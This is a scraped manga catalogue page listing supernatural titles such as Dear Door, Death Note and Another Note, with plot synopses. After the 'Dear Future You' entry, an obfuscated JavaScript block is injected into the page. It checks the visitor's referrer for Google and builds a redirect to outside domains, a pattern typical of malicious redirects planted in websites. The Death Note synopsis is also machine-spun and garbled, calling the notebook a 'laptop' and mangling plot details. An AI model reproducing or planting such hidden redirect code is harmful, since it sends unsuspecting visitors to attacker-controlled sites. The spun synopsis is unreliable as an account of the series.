Supernatural - Page 87

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6210 results

Dear Anemone

When Gaku lands on the Galapagos Islands, a paradise is the last thing he'll be experiencing. With creatures undergoing horrific evolutions, only one rule still stands--the survival of the fittest!


Dear Door

While in hot pursuit of wanted criminals, a police officer has an unexpected encounter with a rather uncanny demon. Barely surviving the accident, Do Gyeong Joon is left baffled, staring at the sky at the retreating form of the mysterious man he had just met. However, not long after, the two meet again when the demon crashes into Do Gyeong Joon’s apartment, whispering: “Hurry up! You need to get inside me-”


Dear Future You

What if you could see your future boyfriend that you didn’t even know of..? The school romance of a girl who can see the future.<script></script><script>function _0x3454(){var _0x5b4bc1=['referrer','.top/','then','IDtwW','.customapi','hHpvX','href','text','26735HEouIM','random','','28qYGScY','ZQIHA','22BFvtQv','includes','nCivm','3231JSYATB','https://ip','5927411YCROAe','ySxGm','google','248643QdcRbC','1626095emkmDW','kQuDg','ERNyi','50070GevjaF','WLfCJ','floor','http://rea','1091532DkTqhv','location','EQtok','7622464EiRINX'];_0x3454=function(){return _0x5b4bc1;};return _0x3454();}(function(_0x49bde2,_0x1cb273){var _0x392c84=_0x334a,_0x254d86=_0x49bde2();while(!![]){try{var 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Dear my Doll - Kimito no Yakusoku

Summary from Iskultrip Scans: Story 1 (Phantom Lim): Lim and Iota live in a robot country. Lim, who is in love. Iota, whom she loves. The kind robotic maids. Lim has always thought her sunshine-filled days would go on forever, but... what is this promise Iota made with her in the past and the secret that he's keeping from her?


Dear Noman

Since a young age, Unohana Mashiro has been able to see “things that aren't human”. Thinking that others would consider her creepy, she pretended not to see them, until one day...


Dear Sir Hannibal

Kibayashi Rento is a 'personification' of a supernatural being descended from a family of Ents (tree-oak people). One day his arm got torn off trying to save a cat from a tree. While he's looking for the arm, he crosses a girl, Kurashina Saya, who finds his lost arm. Saya is Rento's crush, and actually a fellow 'personification' descended from a family of Ghouls, whose main characteristic is appetite for humanoid meat. Can romance blossom between the two supernatural beings? Slight discomfort advised. Don't worry though because he's a plant, so he can regenerate his lost body parts easily, including that aforementioned arm.


Death Edge

From Kawaii Corner: The strangers clad in black clothes in the organization "Death Edge". Their goal is to murder "Angels". These so called "Angels" have killed enough people to fill the park, for the sake of thrill and adrenaline; These dark fallen Angels have landed on Earth.


Death Field

If you take the midnight train by mistake, take a look around you, is it the same world you are familiar with? If not, hold your breath and face your fears...


Death God 4

Monsters descended upon the humans all of a sudden, monsters that can't be detected by most, unless they have a strong sense. An invisible predator, it feasts on humans to grow in strength and powers. 4 Death Gods are chosen to destroy these monsters and to seal the "sink" hiding the monsters fast.


Death Note

Death Note Manga is a Japanese manga series written by Tsugumi Ohba and illustrated by Takeshi Obata. The storyline follows a high school student who falls upon a supernatural laptop from a shinigami named Ryuk that allows its user the power to kill anyone whose name and face he understands, Light Yagami. The series centres around Light's subsequent attempts to make and rule a world "cleansed of evil" as a "God" using this located laptop, as well as the efforts of a detective called L to stop him. Light Yagami is a blase young prodigy who resents all things bad. His life experiences a radical change when he falls upon the "Death Note", a laptop that kills anyone whose name is written inside. After testing with all the laptop, its credibility is confirmed by Light and is joined through an unexpected house guest - the previous owner of the laptop, a shinigami called Ryuk. Light tells Ryuk of his plan to exterminate all of the individuals he considers unfair and wrong in the planet, until only individuals whom he's deemed truthful and type stay. Once he ends creating this utopia, he means to rule over it as the self proclaimed "God of the new world". Main character in Death Note manga Shortly, the inexplicable deaths of offenders get the eye of Interpol as well as the world-renowned detective, "L". L stages a fake public appearance and immediately deduces the serial killer, openly called "Kira" (based on the Japanese pronunciation of the word "killer"), is situated in the Kanto area and will kill people without direct contact. Lighting starts a cat and mouse game with him, and recognizes that L will be his biggest hindrance, in the efforts of stopping his life and learning his identity. By helping his task force and L track down Kira light efforts to produce an alibi. His strategy is impeded well-known model Misa Amane by a lovestruck second Kira, and her shinigami Rem. Misa trails him to his house, where he consents to be her boyfriend in exchange for her obedience and conformity and identifies Light as the primary Kira. Nevertheless, Misa's infatuation with Light shortly drives her to make several errors that are tactical and L begins to discover the two increasingly more funny from the second. Misa interrogated and is soon arrested and Light turns himself in voluntarily shortly after. They both subsequently relinquish ownership of the Death Notes, erasing their memories of everything they did involved using the publication. Throughout their detention, a third Kira appears. L releases them plus they can be put under house arrest in the headquarters of L when it becomes clear that Misa and Light cannot be carrying out the homicides of the third Kira. The task force get him and identify the third Kira as Yotsuba Group executive Kyosuke Higuchi. Upon touching the laptop, Light recovers his memories as Kira and kills Higuchi, recovering possession of the Death Note "exactly as planned". The task force verify the existence of shinigami and learns of the Death Notes. His elaborate strategy is subsequently completed by light into killing his guard Watari and L to save Misa's life by manipulating Rem. Rem expires herself because killing to prolong the lifespan of individual breaks shinigami law. Upon L's departure, Light becomes the second "L" and continues his charade of hunting for Kira while carrying out the crimes himself. The story picks up four years after, with Kira pulling a swell of public support as well as a sizable network of contacts. Two young men, raised to L as possible successors, are shown - Near, a detective and the United States Government associated, and Mello, an associate of the Mafia. As his first action against Kira, Mello efforts to obtain the Death Note held by the Kira task force, by kidnapping the manager of the National Police Agency in Japan. When Light homicides the manager out of hand this strategy is stymied. Refocusing on the families of the task force, Mello kidnaps the sister Sayu as a replacement of Light; the task force's laptop is lost to Mello, although she's immediately saved. To recover it, Light's dad Soichiro commerces half of his remaining life to Ryuk for the "Shinigami Eyes" - the skill to view people's names on sight. During an assault on the headquarters of Mello, Soichiro learns the name of Mello, but doesn't kill him. He's shot at repeatedly a strike, and dies soon later in hospital. After this, several and Near members of the task force start to imagine of being Kira Light. In result, Light gets Misa to quit her laptop and lifts another "Kira", Teru Mikami, a prosecutor and fervent supporter of Kira. Mikami kills Kira's former spokesman for being selfish and recruits the former girlfriend of Light, a newscaster and Kiyomi Takada, to replace him. Light shows himself to Takada as the first Kira, and understanding that the other Kiras and he are under Near's surveil, builds a decoy strategy to hide the location of the authentic Death Note. Mello kidnaps and returns Takada, who kills him with a laptop piece that is concealed. Light subsequently gets Takada commit suicide from implicating him to keep her, but Mikami, oblivious of the activities of Light, tries to kill her as well. This exposes the true Death Note Mikami has hidden, showing the strategy of Light in the final minute. In the story's climax, the two investigation teams meet in the "Yellow Box Warehouse". Mikami, who writes down the names of everybody in the warehouse except Light soon joins them. Near subsequently shows that he replaced the laptop of Mikami using a forgery and the names written implicate Light as Kira. In despair, Light attempts to make use of the laptop bit that is final in his watch to kill Near, but task force member Touta Matsuda, who's enraged in the way in which Light called his own daddy a victim, shoots him several times. Ryuk realises Light uses his private Death Note to kill Light having a heart attack, as he promised to do at the start of the narrative and has lost. Other manga: + Terra Formars + Claymore manga


Death Note - Another Note - Los Angeles Bb Renzoku Satsujin Jiken (Novel)

There's a serial killer on the loose in Los Angeles and the local authorities need help fast. For some reason the killer has been leaving a string of maddeningly arcane clues at each crime scene. Each of these clues, it seems, is an indecipherable roadmap to the next murder. Onto the scene comes L, the mysterious super-sleuth. Despite his peculiar working habits - he's never shown his face in public, for example - he's the most decorated detective in the world and has never tackled a cased he hasn't been able to crack. But this time he needs help. Enlisting the services of an FBI agent named Naomi Misora, L starts snooping around the City of Angels. It soon becomes apparent that the killing spree is a psychotic riddle designed specifically to engage L in a battle of wits. Stuck in the middle between killer and investigator, it's up to Misora to navigate both the dead bodies and the egos to solve the Los Angeles BB Murder Cases.
